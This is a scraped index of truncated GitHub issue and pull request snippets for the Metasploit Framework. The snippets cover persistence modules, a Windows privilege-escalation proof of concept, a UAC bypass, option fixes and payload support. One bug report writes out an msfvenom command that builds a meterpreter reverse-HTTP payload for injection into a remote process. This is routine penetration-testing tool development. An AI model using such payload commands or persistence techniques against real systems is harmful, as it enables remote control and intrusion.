metasploit-framework
metasploit-framework copied to clipboard
rapid7
Metasploit Framework
Hi there, I am trying to experiment enumeration of my homelab kind kubernetes cluster just for learning on how we can enumerate via msfconsole and kuberentes auxiliary module. I followed...
In the same spirit than #16791, but for Linux: ## Package managers - [x] Yum package manager persistence, in `./exploits/linux/local/yum_package_manager_persistence.rb` - [x] Apt package manager persistence, in `./exploits/linux/local/apt_package_manager_persistence.rb` - [...
These module documentations were not fully updated when we switched `BIND_DN` and `BIND_PW` options to `DOMAIN`, `USERNAME` and `PASSWORD`: https://github.com/rapid7/metasploit-framework/pull/16700 The references to `BIND_DN` and `BIND_PW` should be replaced by...
Much of the platform and architecture detection code within Framework and accompanying libraries has grown naturally as needed over the past 20 years. Many patches and enhancements were implemented as...
## Summary Crowdefense recently shared a [PoC](https://github.com/Crowdfense/CVE-2024-21338) for a LPE in Windows. Resources: https://www.crowdfense.com/windows-applocker-driver-lpe-vulnerability-cve-2024-21338/ https://nvd.nist.gov/vuln/detail/CVE-2024-21338
[Hacker House](https://hacker.house/) just released [Stinger](https://github.com/hackerhouse-opensource/Stinger), an UAC-bypass based on the one from the [Vault7 leak](https://wikileaks.org/ciav7p1/cms/page_20251107.html): obtain the token from an auto-elevated process, modify it, and reuse it to execute as...
It'd be really nice if `OptEnum` were updated to validate values without being case sensitive while preserving the case the author was expecting. For example a setting `OptEnum.new('PROTOCOL', [true, 'Protocol...
## Steps to reproduce 1. Created shellcode with msfvenom (msfvenom -p windows/x64/meterpreter/reverse_http EXITFUNC=thread LPORT=24601 LHOST=10.0.0.11 -f raw -o shellcode.bin) 2. Injected it to an x64 process in a remote machine....
## Pull Request Title *Improved README Documentation for Metasploit Framework* ## Description ### What This Change Does This pull request improves the clarity and organization of the Metasploit Framework's README...
Architecture Support: Added support for ARM-based payloads alongside the existing command-based payloads, including the use of the CmdStager mixin for ARM targets. TARGETURI Handling: Updated the TARGETURI option to handle...
